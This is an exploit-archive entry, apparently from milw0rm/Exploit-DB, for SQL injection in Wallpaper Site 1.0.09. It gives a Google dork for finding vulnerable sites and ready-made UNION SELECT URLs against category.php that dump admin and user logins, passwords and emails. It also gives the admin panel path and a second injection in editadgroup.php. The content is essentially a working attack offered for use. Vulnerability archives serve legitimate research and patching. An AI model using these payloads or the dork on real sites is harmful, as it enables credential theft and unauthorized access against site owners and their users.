Wallpaper Site 1.0.09 - 'category.php' SQL Injection

EDB-ID:

4770


Author:

Koller

Type:

webapps


Platform:

PHP

Date:

2007-12-22


#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : Wallpaper site 1.0.09
# GoogLe Dork      : Powered by EasySiteNetwork 
# Of. site         : http://www.easysitenetwork.com/
# The price        : ?
# Risk             : Average
# Found By         : Koller
# Thanks           : all members xaker.name & grabberz.com
# Vulnerable files : category.php, editadgroup.php

# Vuln : www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password),444+from+admin_login/*
#        www.victim.com/category.php?catid=1+union+select+111,222,concat_ws(char(58),login,password,email),444+from+users/*
#
# Admin panel: www.victim.com/siteadmin/index.php
#
# Addon :) - sql-injection in editadgroup.php - www.victim.com/siteadmin/editadgroup.php?groupid=2 union select 111,222/*

# P.s. Happy New Year 8)
#
# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-22]